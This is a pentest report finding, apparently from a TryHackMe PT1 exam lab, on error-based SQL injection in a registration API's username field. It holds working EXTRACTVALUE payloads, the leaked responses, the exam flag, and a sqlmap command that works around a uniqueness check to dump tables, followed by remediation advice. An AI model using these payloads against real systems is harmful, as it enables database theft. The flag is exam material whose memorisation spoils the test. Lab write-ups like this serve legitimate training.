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PENETRATION TEST REPORT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="6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TryHackMe PT1 Certification Examination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Finding #4 of 4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F3864" w:sz="10" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="480"/>
        <w:jc w:val="center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10.200.150.100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March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 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Injection — Error-Based (EXTRACTVALUE)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Affected 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/api/v1.0/user — username field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 Severity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 — 9.8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THM{6a17de51-099a-44e0-94cc-fc67f55ed5b5}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30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Vulnerability Description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The username field on the registration endpoint passes user input directly into a MySQL query without sanitization. Injecting a single quote breaks the query syntax and the raw MySQL error is returned in the response — confirming the injection point and providing a data exfiltration channel through error messages.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Attack Path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Step 1 — Confirm the Injection Point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Send a registration request with a single quote in the username field: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{"firstname":"a","lastname":"a","username":"test'","email":"test@test.com","password":"password"}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Server responds with a raw MySQL error, confirming unsanitized input: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{"message":"Server error: 1064 (42000): You have an error in your SQL syntax..."}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Step 2 — Extract the Database Name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Use EXTRACTVALUE to leak data via the error message. 0x7e is the hex for ~ used as a separator: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{"firstname":"a","lastname":"a","username":"xyz1' AND EXTRACTVALUE(1,concat(0x7e,database()))-- -","email":"a1@b.com","password":"password"}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Response leaks the database name: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{"message":"Server error: 1105 (HY000): XPATH syntax error: '~trybankmedbs'"}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Step 3 — Extract Table Names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Note: each request needs a unique username — the endpoint returns 401 on duplicates.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{"firstname":"a","lastname":"a","username":"xyz2' AND EXTRACTVALUE(1,concat(0x7e,(SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema='trybankmedbs')))-- -","email":"a2@b.com","password":"password"}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Tables returned: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{"message":"Server error: 1105 (HY000): XPATH syntax error: '~Flags,Users'"}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Step 4 — Dump the Flag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EXTRACTVALUE truncates at 32 characters, so two requests are needed to get the full flag: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{"firstname":"a","lastname":"a","username":"xyz3' AND EXTRACTVALUE(1,concat(0x7e,(SELECT flag FROM Flags)))-- -","email":"a3@b.com","password":"password"}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pP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{"message":"Server error: 1105 (HY000): XPATH syntax error: '~THM{6a17de51-099a-44e0-94cc-fc6'"}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Get the second half using substring():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{"firstname":"a","lastname":"a","username":"xyz4' AND EXTRACTVALUE(1,concat(0x7e,(SELECT substring(flag,32) FROM Flags)))-- -","email":"a4@b.com","password":"password"}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Combined: THM{6a17de51-099a-44e0-94cc-fc67f55ed5b5}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Step 5 — Automated Dump with sqlmap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The --eval flag generates a random username per request, bypassing the uniqueness constraint automatically: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sqlmap -u "http://10.200.150.100:8080/api/v1.0/user" \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--data '{"firstname":"a","lastname":"a","username":"test*","email":"test@b.com","password":"password"}' \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--method POST -H "Content-Type: application/json" \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--dbms=mysql --technique=E \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-D trybankmedbs -T Flags --dump --batch \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--eval="import random,string; username=''.join(random.choices(string.ascii_lowercase,k=10))"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sqlmap output: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+-------------------------------------------+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| THM{6a17de51-099a-44e0-94cc-fc67f55ed5b5} |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+-------------------------------------------+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The same command against the Users table would dump all usernames, password hashes, and emails in a single run.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Remediation Actions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 prepared statements. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Never concatenate user input into SQL queries. Use parameterised queries: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cursor.execute('SELECT * FROM Users WHERE username = %s', (username,))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Suppress raw database errors. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace all MySQL error messages with a generic response before returning to the client. Raw errors should only be written to internal server logs.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Validate the username field. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Reject any input containing SQL metacharacters (quotes, dashes, comment sequences). Allow only alphanumeric characters and underscores.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Restrict database permissions. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The application database user should have no access to information_schema and no permissions beyond what the application requires to function.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PENETRATION TEST REPORT  |  TryHackMe PT1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2026-03-04T18:14:06.501Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-04T18:14:06.502Z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